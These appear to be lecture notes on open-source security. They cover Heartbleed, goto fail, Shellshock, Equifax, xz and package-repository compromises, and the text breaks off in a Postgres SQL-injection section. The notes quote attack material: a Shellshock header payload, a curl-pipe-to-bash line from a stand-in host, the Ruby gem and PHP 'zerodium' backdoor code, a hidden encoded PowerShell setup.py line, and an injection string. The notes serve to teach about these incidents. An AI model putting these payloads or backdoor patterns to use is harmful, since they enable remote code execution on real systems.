Open-Source Security

Is open source more secure because more people look at the code? Or less secure, because bad guys can look at the code and find bugs?

This question has been debated for quite some time. For a while, so-called "fuzzing" techniques (for generating random input) did work better when the source was available: the user would examine the source and generate input until all the edge cases were triggered. The goal was to execute every part of the code.

But then that changed: tools were developed that could do this given only the object code. At that point, having the source was no longer a liability. A large number of Windows exploits started to appear.

On the other hand, the truth is that not everybody looks at the code. In most cases, not very many do.

TLS, for Transport Layer Security, is an encryption layer used above TCP (or UDP). It is what creates the 's' in https, for secure http.

Three issues

First, the software can have bugs. Perhaps this is more likely for Open Source because of fewer development resources, though that is hard to say.

Second, repositories can be compromised. This, too, can happen with commercial software, but Open Source does seem to be at least a little more prone to this.

Finally, it is easy for users to fall behind on upgrading. If you're installing an e-commerce package from Microsoft, then Microsoft will make sure it gets updated. However, if you're building your own e-commerce package from a dozen separate open-source projects, then it's your job to update them all. It's easy to forget.

These issues completely ignore the question of how many users actually look at the code in their open-source packages, or whether it's easier to figure out vulns once you hear vaguely of a problem with a certain project.

It remains true that Open Source projects are easier to trust. Even software from Microsoft is often tracking you or selling you something.

Debian OpenSSL bug

At some point (probably 2006), Debian removed a couple lines from the Debian copy of OpenSSL because the lines generated complaints from code-analysis software. Here's the code as of today, from boinc.berkeley.edu/android-boinc/libssl/crypto/rand/md_rand.c; the function is static void ssleay_rand_add(const void *buf, int num, double add). The variable m is a pointer to a certain structure. The call to MD_Update() itself is actually a macro:

#define MD_Update(a,b,c)	EVP_DigestUpdate(a,b,c)

The variable m is a pointer to a certain structure. Here is part of the code:

	for (i=0; i<num; i+=MD_DIGEST_LENGTH)
		{
		j=(num-i);
		j=(j > MD_DIGEST_LENGTH)?MD_DIGEST_LENGTH:j;

		MD_Init(&m);
		MD_Update(&m,local_md,MD_DIGEST_LENGTH);
		k=(st_idx+j)-STATE_SIZE;
		if (k > 0)
			{
			MD_Update(&m,&(state[st_idx]),j-k);
			MD_Update(&m,&(state[0]),k);
			}
		else
			MD_Update(&m,&(state[st_idx]),j);

		/* DO NOT REMOVE THE FOLLOWING CALL TO MD_Update()! */
		MD_Update(&m,buf,j);
		/* We know that line may cause programs such as
		   purify and valgrind to complain about use of
		   uninitialized data.  The problem is not, it's
		   with the caller.  Removing that line will make
		   sure you get really bad randomness and thereby
		   other problems such as very insecure keys. */

		MD_Update(&m,(unsigned char *)&(md_c[0]),sizeof(md_c));
		MD_Final(&m,local_md);
		md_c[1]++;

		buf=(const char *)buf + j;

		for (k=0; k<j; k++)
			{
			/* Parallel threads may interfere with this,
			 * but always each byte of the new state is
			 * the XOR of some previous value of its
			 * and local_md (itermediate values may be lost).
			 * Alway using locking could hurt performance more
			 * than necessary given that conflicts occur only
			 * when the total seeding is longer than the random
			 * state. */
			state[st_idx++]^=local_md[k];
			if (st_idx >= STATE_SIZE)
				st_idx=0;
			}
		}

The code-analysis software thought the repeated calls (this is inside a loop) to MD_Update(&m,buf,j) made use of uninitialized data. This may actually have been the case, in that perhaps some entropy was indeed supposed to come from the uninitialized data. The code does look odd, though, from a deterministic point of view. Still, the point of the repeated calls to MD_Update() was to generate additional randomness.

Commenting out the call to MD_Update(&m,buf,j) greatly reduced the total available entropy. Supposedly the entropy now came from a single 16-bit number. This really breaks the random-number generator.

Debian discovered and fixed the error in 2008.

Apple TLS bug

Here is the source code (Apple has open-sourced a lot of OS X, but not the GUI parts of it):

static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
	OSStatus        err;
	...

	if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
		goto fail;
	if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
		goto fail;
		goto fail;
	if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
		goto fail;
	...

	err = sslRawVerify();
	...

fail:
	SSLFreeBuffer(&signedHashes);
	SSLFreeBuffer(&hashCtx);
	return err;
}

Note the duplicated "goto fail". Note the lack of enclosing {}. Despite the appearances of the indentation, the second goto fail is thus always executed. The call to SSLVerifySignedServerKeyExchange() always jumps to fail. But most likely we still have err==0 at this point (because none of the err != 0 checks actually succeeded), and so the connection is verified even if there was a certificate mismatch.

It's times like this that it is really handy to have the compiler doing dead-code detection. Fail.

Ok, nobody was looking at the Apple source here outside of Apple.

OpenTLS bug

As the Debian and Apple issues above show, anyone can introduce TLS bugs. But the "heartbleed" bug was clearly related to the relatively modest development resources available to the OpenSSL foundation.

Most servers used OpenSSL, officially OpenTLS. TLS contains a heartbeat provision: the client sends occasional "heartbeat request" packets and the server is supposed to echo them back, exactly as is. This keeps the connection from timing out. That is, the client sends a (len,data) pair, and the server is supposed to echo back that much data. Part of the reason for echoing back data is so the client can figure out which request triggered a given response. It might make the most sense for the client request data to represent consecutive integers: "0", "1", ..., "10", "11", "12", ....

The problem is that the client can lie: the client can send a request in which len ≠ data.length. If len < data.length, this is harmless; just the first len bytes of data get sent back. But what happens if len > data.length, and the server sends back len bytes? In this case the server would try to send too much back. In a sensible language, this would result in an array-bounds exception for data. In C, however, the result is the grabbing of a random chunk of memory beyond data. Suppose a sneaky client sent, say, a 3-byte payload, but declared the payload length (the value of len) as, say, 1000 bytes. The server now sends back 997 bytes of general heap memory, which may contain interesting content. Unpredictable, but interesting.

Here is the original code, from tls1_process_heartbeat(SSL * s). The variable payload represents the length of the heartbeat payload.

n2s(p, payload);	// extract value of payload (the length)
pl = p;
...
if (hbtype == TLS1_HB_REQUEST) 
	{
	unsigned char *buffer, *bp;
	int r;
	/* Allocate memory for the response, size is 1 bytes
	 * message type, plus 2 bytes payload length, plus
	 * payload, plus padding
	 */
	buffer = OPENSSL_malloc(1 + 2 + payload + padding);
	bp = buffer;

	/* Enter response type, length and copy payload */
	*bp++ = TLS1_HB_RESPONSE;
	s2n(payload, bp);
	memcpy(bp, pl, payload);    // pld: copy payload bytes from pointer pl to pointer bp (=buffer, above)
	bp += payload;
	/* Random padding */
	RAND_pseudo_bytes(bp, padding);

	r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);

	if (r >= 0 && s->msg_callback)		// pld: this will get moved
	      s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
	            buffer, 3 + payload + padding,
	            s, s->msg_callback_arg);
	OPENSSL_free(buffer);

	if (r < 0)
	      return r;
	}

There is no check here that the value of payload, the declared length of the payload, matches the actual length of the payload.

Here is the fix:

if (hbtype == TLS1_HB_REQUEST) 
	{
	unsigned char *buffer, *bp;
	int r;
	/* Allocate memory for the response, size is 1 bytes
	 * message type, plus 2 bytes payload length, plus
	 * payload, plus padding
	 */
	buffer = OPENSSL_malloc(1 + 2 + payload + padding);
	bp = buffer;

	/* Enter response type, length and copy payload */
	*bp++ = TLS1_HB_RESPONSE;
	s2n(payload, bp);

	if (r >= 0 && s->msg_callback)		// this got moved, so it always executes even if one of the returns below is made
	      s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
	            buffer, 3 + payload + padding,
	            s, s->msg_callback_arg);

	if (1+2+16 > s->s3->rrec.length)	// check if actual payload length > 0!
	      return 0;

	memcpy(bp, pl, payload);    // copy payload bytes from pointer pl to pointer bp (=buffer, above)

	if (1+2+payload+16 > s->s3->rrec.length)	// check if actual payload length is longer than declared length
	      return 0;					// RFC 6520 section 4 says to silently discard

	bp += payload;
	/* Random padding */
	RAND_pseudo_bytes(bp, padding);

	r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);

	OPENSSL_free(buffer);

	if (r < 0)
	      return r;
	}

Google reported the bug to the OpenSSL Foundation on April 1, 2014. It is estimated that somewhere between 15 and 60% of sites using SSL were affected.

The bug is now fixed. Nobody knows how much it was exploited.

The more interesting question might be why OpenSSL didn't get more attention before. There were people outside the OpenTLS Foundation looking at the code, but none of them noticed Heartbleed.

Ultimately, the problem was that OpenTLS was severely underfunded. The president of the OpenSSL foundation is (or was, in 2014; he's since left) Steve Marquess. In a blog post after Heartbleed, he described himself as the fundraiser. The OpenSSL foundation received $2,000/year in donations, and also did some support consulting (the latter earned a lot more).

In the week after Heartbleed, the OpenSSL foundation received $9,000, mostly in small donations from individuals. Not from the big corporate users of OpenSSL.

The foundation has one paid employee, Stephen Henson, who has a PhD in graph theory. He is not paid a lot. Before Steve M created the OpenSSL foundation, Steve H's income has been estimated at $20K/year. (The heartbleed error was not his.)

Despite the low level of funding, though, in the eight (or more) years before Heartbleed the OpenSSL Foundation was actively seeking certification under the NIST Cryptographic Module Validation Program. They understood completely that cryptography needs outsider audits.

As of 2014, at least, the two Steves had never met face-to-face. Like Steve M, Steve Henson moved on to other projects in 2017.

A month after the bug's announcement, the Linux Foundation announced that it was setting up the Core Infrastructure Initiative. They lined up backing from Google, IBM, Facebook, Intel, Amazon and Microsoft. The first project on the agenda was OpenSSL, and its struggle to gain certification from the US government.

In 2015 a formal audit of OpenSSL was funded, by the Open Crypto Audit Project, opencryptoaudit.org. That audit has now been completed; a 2016 status report is at icmconference.org/wp-content/uploads/G12b-White.pdf.

Here is a report of a later audit: ostif.org/the-ostif-and-quarkslab-audit-of-openssl-is-complete.

As of 2016, Black Duck reported that 10% of the applications they tested were still vulnerable to Heartbleed, 1.5 years after the revelation (info.blackducksoftware.com/rs/872-OLS-526/images/OSSAReportFINAL.pdf).

See also the Buzzfeed article "The internet is being protected by two guys named Steve".

More Open-Source Security Issues

Magento

Magento is an e-commerce platform owned by Adobe. It is described as having an "open-source ecosystem". It is available on github at github.com/magento. I assume that is the "community edition"; there is also an "enterprise edition".

A vulnerability was announced in April 2017 by DefenseCode LLC, six months after it was reported privately to Magento. Magento did not respond directly to DefenseCode. The vulnerability "could" lead to remote code execution, though there are some additional steps to get that to work, and it was not clear whether that actually happened in the wild. See www.defensecode.com/advisories/DC-2017-04-003_Magento_Arbitrary_File_Upload.pdf.

If a site adds a link to a product video stored remotely on Vimeo, the software automatically requests a preview image. If the file requested is not in fact an image file, Magento will log a warning message, but it will still download the file. The idea is to trick Magento into downloading an executable file, eg a .php file. An updated .htaccess file also needs to be downloaded, but once the basic file-download idea is working this is not difficult. Because of the way files are stored, the .php file should begin with ".h", so the .htaccess file ends up in the same directory.

Parts of the strategy also involve cross-site request forgeries (CSRF) against someone with Magento management privileges at the target site. Even low-level privileges are sufficient. There are numerous strategies for trying to get someone to click on a suitable link; none of them are sure bets.

Magento's failure to respond more aggressively to DefenseCode was puzzling. This seems less likely in a "true" open-source project.

As of 2018, Magento was still running into security issues, often related to brute-force attacks on administrative passwords, which were often not well-configured. Magento is an attractive target, as it is an e-commerce front-end, and as a result a large number of credit-card transactions flow through it.

Also in 2018, open-source security firm Black Duck sold for half a billion.

Equifax

In August 2017 credit-reporting company Equifax discovered that personal records on 140 million US people had been exfiltrated. The actual vulnerability was in Apache Struts 2, which is a framework for developing Java server-side web applications. It extends the Java Servlet API. Struts has a history of serious vulnerabilities. The vulnerability in question was CVE-2017-5638, which allows for remote code execution.

Equifax was notified of the issue in March 2017. They looked, but could not find a place on their site where Struts was being used! The vulnerability went unpatched, even as it was being routinely exploited in the wild.

Making sure tools and frameworks are updated is tedious work. Something like Struts can be buried in the archives of a project that was largely completed years ago. Ultimately, the attackers found a flaw in a very old package known as the Automated Consumer Interview System.

In 2020, the FBI announced charges against four Chinese nationals who they believe developed the attack.

A more detailed analysis is at blog.0x7d0.dev/history/how-equifax-was-breached-in-2017. That report attributes the breach to these factors:

Insufficient knowledge of their legacy systems.
Poor password storage practices.
Lack of rigor in the patching process.
Lack of network segmentation.
Lack of Host-Based Intrusion Detection System (HIDS)
Lack of alerting when security tools fail.

Equifax was negligent, in that they missed some things, but it is hard to say they were glaringly negligent.

The Chinese probably use the information to identify people who are under significant financial stress, and who may be vulnerable to bribery.

Shellshock

This is the bug that was in bash that allowed very easy remote code execution. It was discovered and fixed in 2014. The problem is that the act of setting an environment variable -- normally benign -- could be tricked so as to execute a shell script as well, if the environment variable began with a shell function definition.

The shell maintains the environment as a list of (name,value) pairs. Specifically, we can assign an environment variable as follows:

FOO=here_is_my_string

echo $FOO

We can also assign shell functions, eg with

FN() { echo hello;}

(the space before "echo" is significant). Prior to Shellshock, this would be stored in the environment as the pair (FN, "() { echo hello;}").(You can list bash functions with typeset -F, and see the entire environment with env.)

The problem was that one could sneak a command following the function definition, and it would be executed at the time the environment variable was set:

FN() { echo hello;}; echo "hello world!"

(The command, in red here, is not actually part of the function.) This is due to a mistake in recognizing the end of the function body. The above looks to older versions of bash like the following environment-variable assignment, followed by a command.

FN='{ echo hello;}; echo "hello world!"'

Whenever this definition is executed (eg at the time it is made, and whenever the environment is passed to a new process), the 'echo "hello world!"' command would go along for the ride. The core problem here occurs with shell variables that begin with '()'; normal shell-variable strings do not result in command execution. That is, assigning a variable FN2='echo "hello world"' would not result in executing the command; nor would FN3="foo"; echo "hello world" (though when done for the first time the FN3 example would echo "hello world" once).

This is most of the problem. The other part is that web servers, and quite a range of other software, routinely accept strings from clients that they then turn into environment variables. For example, if the client sends the following GET request to the server (from blog.cloudflare.com/inside-shellshock):

GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: cloudflare.com

then the server turns it into the following environment settings (before executing the GET request):

HTTP_ACCEPT_ENCODING=gzip,deflate,sdch
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8,fr;q=0.6
HTTP_CACHE_CONTROL=no-cache
HTTP_PRAGMA=no-cache
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
HTTP_HOST=cloudflare.com

The server does this so that a cgi script on the server will have access to these values, through its environment. However, because of the bug, setting environment variables can lead to code execution!

Now, if the client instead sent the following text as User-Agent (there is no actual "string" here, in fact):

User-Agent: () { :; }; /bin/eject

Then the command /bin/eject would be executed on the server. (As for the shell function, ":" is the bash null command; the legal function part is() { :; };.

A consequence of the patch is that bash functions are no longer stored in the environment at all. (This wouldn't strictly have been necessary, but it probably was a good idea.)

Meltdown and Spectre

The Meltdown and Spectre vulnerabilities affect Intel CPUs; Intel open-sources nothing about its processors. But open-source operating systems still had to create patches.

The problem is that open-source patches had to be created while there was still a news embargo on the details of the vulnerability, lest miscreants get a leg up on exploiting them.

Meltdown and Spectre were discovered in the summer of 2017 by Jann Horn of Google, Werner Haas and Thomas Prescher from Cyberus Technology, and Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz from Cyberus Technology. The discoverers informed Intel, and all agreed to announce the flaw only once there was a fix in place.

In November 2017, Alex Ionescu noticed an upgrade to Windows 10 that made the CPU run slower, with no obvious benefit. He suspected this was a vulnerability patch.

On Wednesday January 3, there were new commits to the Linux kernel. Observers quickly noticed that the commits didn't seem to make sense, from a performance perspective. Rampant speculation that they were related to a hardware vulnerability led to the announcement of Spectre and Meltdown on that date. The scheduled release/announcement date was to be January 9, Microsoft's "Patch Tuesday".

Still, the Linux community by and large did abide by the embargo rules. This is complicated, because it means not using the public discussion system that has been put in place. It also means not releasing important security fixes until the embargo is ended.

The head of OpenBSD, Theo de Raadt was extremely vexed, as OpenBSD was not given advanced warning:

Only Tier-1 companies received advance information, and that is not responsible disclosure – it is selective disclosure.... Everyone below Tier-1 has just gotten screwed.

De Raadt also argued that, while Spectre might be considered an unforeseen bug, the issues behind Meltdown were long understood to at least some degree. Intel decided to go ahead with their speculative-execution design anyway, in order to beat the competition.

OpenBSD did announce a fix before the end of the embargo for the Wi-Fi Krack vulnerability of October 2017. The theory at that time was that OpenBSD would therefore not be given advance warning of the next vulnerability. But several other smaller OS vendors (Joyent, SmartOS) also were not told about Meltdown/Spectre in advance.

Still, there is a real problem: to abide by embargo rules means sitting on a fix, knowing your users might be being attacked. It means your source is, until the embargo ends, no longer "open".

Windows Security

Windows systems are quite hard to secure, partly because there are so many files that are not well-understood within the security community, and partly because of the registry.

Licensing rules don't help. If you want to verify the SHA-3 checksum of every file, for example, you pretty much have to boot off a clean bootfile. Otherwise, malware that has made it into the kernel can make it seem that all files are unchanged. However, in Windows, a separate boot device technically requires a separate license. And in practice making a bootable Windows USB drive is not easy, without paying for a separate license.

Cryptography Software

It is certainly reasonable to think of commercial software as reliable. After all, one can read the reviews, and a company couldn't stay in business if it didn't keep its users happy. If the software doesn't work properly, won't users know?

If the software is a word processor, and it keeps crashing, or failing to format text properly, the failure is obvious. If the software does complex engineering calculations, that's harder to detect, but usually users do at least a little testing of their own.

But if closed-source software does encryption, it is almost impossible to verify that it was done correctly. Just what random-number algorithm was used? Was the AES encryption done properly? (If it was not, then the problem becomes very clear if the software is sending encrypted content to an independent decryption program, but this is often not the case. Lots of times, the same program is used to encrypt files and then later to decrypt them, in which case an algorithm with a security flaw is almost undetectable.) Was the encryption done first, followed by the authentication hash (HMAC), or was it the other way around? Doing it the first way is much safer, as the HMAC then provides no information about whether brute-force decryption is on the right track.

For reasons like this, some commercial encryption software is audited. But usually it is not. The bottom line is that commercial crypto is hard to trust.

Sometimes open-source isn't audited either. But it's hard to find out. And even with OpenSSL, people outside the OpenSSL foundation were looking at the basics of encryption, to make sure it looked ok.

Software Trust

Whatever one can say about open-source reliability (which, in general, is comparable to commercial-software reliability), open source wins the trust issue hands down. Once upon a time, most software was trustworthy, in that you could be reasonably sure the software was not spying on you. Those days are gone. Most Android apps spy, to some degree or another, on the user. Microsoft Office appears not to, but Windows 10 sends quite a bit of information back to Microsoft (some of this can be disabled through careful configuration).

Spyware is almost unknown, however, in the open-source world. Ubuntu has a search feature, that returns some information to Canonical, but that's reasonably up-front. Firefox often asks to send crash reports, but, again, that's open. The reasons open-source spyware is so rare are:

users intensely dislike it
it is usually easy to find in the source code attempts to create new network connections that exfiltrate data back to the mothership

Ironically, "free" software that is not open-source is usually spyware: "if you're not paying for the product, you are the product". Most non-open-source browser add-ons, in particular, are spyware. Many Android apps are spyware; flashlight apps are notorious.

Open-source trust is not always quite straightforward. Firefox, for example, is the browser with the most privacy-protection features, hands down. A version of Firefox is the basis for the Tor browser. That said, many Firefox privacy features are disabled by default, because some commercial sources of Firefox funding have had concerns.

SourceForge (and Gimp)

SourceForge is a popular alternative to GitHub for open-source projects. GitHub makes money selling space for non-public projects (public projects are free). SourceForge sold banner advertisements, and in 2013 started a "bundleware" program in which a user who downloaded a program or source tree would optionally receive a second download. The second download was selected by default, though users could unselect it. SourceForge is often used to distribute binaries, so this bundleware issue was not easily avoided once the download started.

The problem was that the second downloaded package, a paid installation, often involved malware. At a minimum, spyware was common. Another common feature was advertisements that were allowed to contain a large DOWNLOAD button.

The Gimp project left SourceForge in 2013, but as of 2015 SourceForge was still distributing Gimp binaries (as an "abandoned" project), and bundling them with malware. This did not go over well with the Gimp team.

How can an open-source project protect itself against malicious distribution? What happens when a project is completely abandoned? What happens when a project simply moves elsewhere?

In 2016 the bundleware program was ended, as new owners took control.

Generally speaking, the actual open-source repositories weren't usually tampered with, though the Gimp case might be an exception.

Tampered or Trojaned Repositories

These are also sometimes called software "supply chain" attacks.

In 2003, the main Linux repository was still on BitKeeper, but they maintained separate mirror repository running CVS. One day a patch appeared in the CVS image in the code for the wait4() call:

+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;

That last '=' on the first line is an assignment, not a comparison. Setting uid to 0 gives the process root privileges. Inside a syscall, that is legal.

This patch never made it back to the main BitKeeper repo, and it was pretty obvious from the beginning as it was the only file on the CVS mirror that didn't have a link back to BitKeeper, but nobody knows how it got there. See lwn.net/Articles/57135.

There was a break-in at kernel.org in 2011. It is not certain that no kernel files were briefly modified, though the rigorous checksumming process would have made that difficult.. Donald Austin was arrested for the breach, in Florida, in 2016.

In 2012, a SourceForge mirror site was hacked, and the phpMyAdmin package was modified to contain malware.

In June 2018, hackers took over a Gentoo mirror account on github and installed file-deleting malware. Gentoo suffered at least one earlier such attack, in 2010.

In July 2018, three packages on the Arch User Repository were infected with malware, including acroread (Adobe Acrobat Reader). Acroread isn't open-source, but it's trivial to install a one-line attack in the installation script:

   curl -s https://badware.ly/stuff.sh | bash &

The AUR is not the same as the Arch distribution itself, but distinctions like this are sometimes hard to keep track of.

In an Aug 7, 2018 blog post, Eric Holmes describes how he gained commit access to Homebrew using credentials he found on the site. See medium.com/@vesirin/how-i-gained-commit-access-to-homebrew-in-30-minutes-2ae314df03ab. Homebrew is a package manager for macs, though it also works well under Linux.

I'm harvesting credit card numbers and passwords from your site. Here's how.

This was a 2018 warning post by David Gilbertson (david-gilbertson.medium.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5), who was not actually doing this, but wanted to point out how easy it was. Gilbertson discusses several standard countermeasures, and describes how they are close to useless.

Webmin

There was also a 2018 attack to Webmin, a system-administration tool, in which password_change.cgi was modified. See www.webmin.com/exploit.html for details. The attack affected the code on the build server, but apparently not the Github repository. Still, the vulnerable code was widely distributed. Most users, for example, installed the Debian or RPM pre-compiled package.

Ruby strong_password gem

In June 2019 the Ruby strong_password gem (Ruby's name for library), version 0.0.7, was hijacked.

See withatwist.dev/strong-password-rubygem-hijacked.html

Here's the crucial code:

Thread.new {
    loop {
      _!{
        sleep rand * 3333;
        eval(
          Net::HTTP.get(
            URI('https://pastebin.com/raw/xa456PFt')
          )
        )
      }
    }
  } if Rails.env[0] == "p"

This:

starts a new thread
after sleeping 3333 seconds (an hour is 3600 seconds)
retrieves code from pastebin.com
executes it
wrapped in an empty exception handler, so you won't see errors (pld: I'm not sure about this, but maybe _! does this)
only if Ruby is running in production mode (making it harder to observe via testing)

This happened in March 2019 with a different Ruby package: zdnet.com/article/backdoor-code-found-in-popular-bootstrap-sass-ruby-library.

In both cases, the github.com source was unchanged; the distribution at rubygems.org was what was compromised.

There were multiple related vulnerabilities discovered in August 2019: github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019

There's also the VestaCP admin interface, and a python package Colourama.

Consider building from source for production versions!

Decompress

A vulnerability in the open-source file-compression utility decompress was discovered in 2020. The problem is that, while decompressing, it could overwrite files such as ../../../etc/passwd (or, for that matter, ./foo/bar/../../../../../etc/passwd). This is a very old idea, but it keeps coming up. It is surprisingly hard to validate legitimate relative paths.

PyYAML

YAML is a data-serialization format, not unlike JSON. PyYAML unpacks YAML data. Alas, it could be tricked, in a bug discovered in 2020, into running arbitrary constructors (and thus arbitrary code) when deserializing data. (The pickle library, the standard Python serialization mechanism, had the same issue a few years earlier.)

Lodash

This is a javascript library that supports a range of common utility functions. It is used in over ~4 million projects on Github alone. A vuln discovered in 2019 involved "prototype pollution", eg modification of Object-level standard methods through introduction of new child classes.

Octopus

The Octopus scanner was malware on Github that tried to infect other repositories, through the use of a Netbeans issue. It was discovered in Spring 2020. Once a Netbeans installation was infected, every .jar file built with that installation would also carry the infection. See securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain.

Zerodium

In March 2021 it was discovered that an update to PHP contained a backdoor. If a website used the compromised PHP, someone could execute arbitrary code through the use of the password "zerodium". The PHP code was on a private git server git.php.net. It looks like the server itself was compromised; the malicious code appeared to have been uploaded by two trusted PHP maintainers (who were not in fact involved).

There is in fact a security company named Zerodium, but they were not related.

The added code looked something like this (bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code):

convert_to_string(enc);
if (strstr(Z_STRVAL_P(enc), "zerodium")) {
zend_try {
zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

The idea was that if your User-Agent HTTP header string began with "zerodium", then the rest of the string would be executed. That "REMOVETHIS" string is just what gets inserted in the logfiles.

The Great Suspender

This was a tool to suspend inactive browser tabs, to conserve resources. It had two million users. The entire project was sold in 2020, and in 2021 Google flagged it as containing malware.

Other package maintainers have been offered significant sums to sell their software.

npm colors and faker libraries

Npm (Node.js Package Manager) is a large open repository for javascript tools. The colors and faker libraries were legit tools that appeared to have been corrupted by a malicious attacker in January 2022.

Alas, the real situation turned out to be somewhat more complicated: package developer Marak Squires was simply really mad at big corporations using his packages without contributing any support. From www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps:

The reason behind this mischief on the developer's part appears to be retaliation—against mega-corporations and commercial consumers of open-source projects who extensively rely on cost-free and community-powered software but do not, according to the developer, give back to the community.

In November 2020, Marak had warned that he will no longer be supporting the big corporations with his "free work" and that commercial entities should consider either forking the projects or compensating the dev with a yearly "six figure" salary.

This is a complicated development. Most open-source maintainers, while sympathetic, ultimately decided this was a terrible idea.

PyPi

This is the Python Package Index. Everybody uses it.

FastAPI is a Python framework with a long history. In March 2022, legitimate package fastapi-toolkit was added. In November 2022, a commit with a malicious backdoor was accepted. It was detected. When incorporated into a web project, the backdoor allows an external attacker to run arbitrary Python, and make arbitrary SQL queries (including writes) using a specially crafted HTTP header. See securitylabs.datadoghq.com/articles/malicious-pypi-package-fastapi-toolkit.

In February 2023, the Phylum team discovered over two thousand new packages that, while not necessarily malicious themselves, all contained the following code in the setup.py file:

if not os.path.exists('tahg'): # basically never exists subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB...AGMAaABlAC4AZQB4AGUAIgA=', shell=False, creationflags=subprocess.CREATE_NO_WINDOW) except: pass

So to install this package is to run that mysterious base64-encoded executable. See blog.phylum.io/phylum-discovers-another-attack-on-pypi.

`100,000 infected Github repositories`

Beginning in late 2023, a malware group started a large-scale project to

fork popular Github repositories
infect them with malware
put them back on Github with a very similar name

No one is quite sure how many malicious repos there are, but 100,000 or so have been identified. Identification is based on the automated clone process; manual malicious clones are not detected. The project name itself is the original one (eg numpy).

Many of the malicious github clones are based on the PyPi packages above.

See apiiro.com/blog/malicious-code-campaign-github-repo-confusion-attack. There is an animated gif there, showing an exec() of a malicious string tabbed over way to the right.

PyTorch

Here's a discussion of how a White Hat team figured out how to attach malicious software to PyTorch, the machine-learning front end.

Our exploit path resulted in the ability to upload malicious PyTorch releases to GitHub, upload releases to AWS, potentially add code to the main repository branch, backdoor PyTorch dependencies – the list goes on. In short, it was bad. Quite bad.

Github allows code to be executed as part of pull requests; this feature is called Github Actions. This makes great sense for testing, but running untrusted code is a problem.

johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch.

Google Search can be dangerous

Brian Krebs has written about how hard it can be to find well-known free software packages using Google. The bad guys have not only created similar websites, but in some cases they have used legitimate Google programs to pay to elevate their sites in the search rankings. See https://krebsonsecurity.com/2024/01/using-google-search-to-find-software-can-be-risky.

The situation is just as bad with open-source packages intended for developers. See www.csoonline.com/article/654560/why-open-source-software-supply-chain-attacks-have-tripled-in-a-year.html and www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-packages.

2024 xz vulnerability

A serious supply-chain attack on ssh was published on March 29, 2024, by Andres Freund, who discovered it by noting an unexpected increase in the cpu usage of ssh.

Ssh, or Secure SHell, is the standard encrypting way of logging into remote machines. Like most encryption software, it compresses its data first, to reduce the feasibility of "known-plaintext" attacks. It uses the xz compression library, maintained by Lasse Collin (who is blameless here).

Here is a discussion of the attack itself: research.swtch.com/xz-script. Perhaps the most interesting technical part of the attack is how the malicious payload is concealed. xz has always had a test directory of random data; this is compressed and then the result is checked against what it was supposed to be. The attackers introduced a binary malicious payload into the test data! The standard configure script runs an m4 (well-known macro package) script, which (in a non-obvious way) extracts this binary payload and runs it, at a specified point. When ssh calls xz on certain data (the key provided by the attacker), the payload enables remote command execution.

But how did the xz project get compromised? This is in many ways the more interesting part. See research.swtch.com/xz-timeline. The package dates from 2004 (ssh is much older, but started to use xz later). In October 2021, Jia Tan appears on the xz mailing list, and sends his first patch. He sends more. He gives every appearance of someone interested in helping the xz package move forward. I have put his name in italics because it appears this is not a real name.

In April 2022, Jigar Kumar emails the list complaining that the Tan patches have not been incorporated. Then Denis Ens similarly emails to complain about the Java version. Kumar continues to pressure Collin about how this project is just way behind, and that Collin needs to pick up the pace. (This sort of abuse is common enough in open source.) In June, Collin writes this:

I haven't lost interest but my ability to care has been fairly limited mostly due to longterm mental health issues but also due to some other things. Recently I've worked off-list a bit with Jia Tan on XZ Utils and perhaps he will have a bigger role in the future, we'll see. It's also good to keep in mind that this is an unpaid hobby project.

Soon enough, Collin bows to the pressure and Tan becomes a maintainer. But Tan takes his time, building more trust; the actual attack isn't loaded until March 9, 2024.

It is tempting to suspect that this is a nation-state project, due to the two-year timeline. That takes patience. But there are some things to suggest that maybe not. The Tan and Kumar emails have similar formats: Tan is JiaT575 and Kumar is similar. And while the obfuscation technique is ingenious, there were some minor problems with the payload.

The article at doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd suggests that was really being backdoored was systemd, the master process launcher. I'm not quite convinced, but systemd does start sshd, and does have waay too many dependencies.

Finally, if you cloned the package from git and built it yourself, the bug would not be there. You had to be building for a deb/rpm package distribution.

2024 Postgres SQL-injection vulnerability

Postgres has a long history of being careful to prevent SQL injection. Here's the basic example. You want to query the record of a specific user, to check their password, where $username is a string taken from the input:

select * from users u where u.username = '$username'

The idea is to supply as input the username bob' or 1=1;'

This then expands naively into

select * from users u where u.username = 'bob' or 1=1;''

Which returns all users because the 1=1 condition is always true.

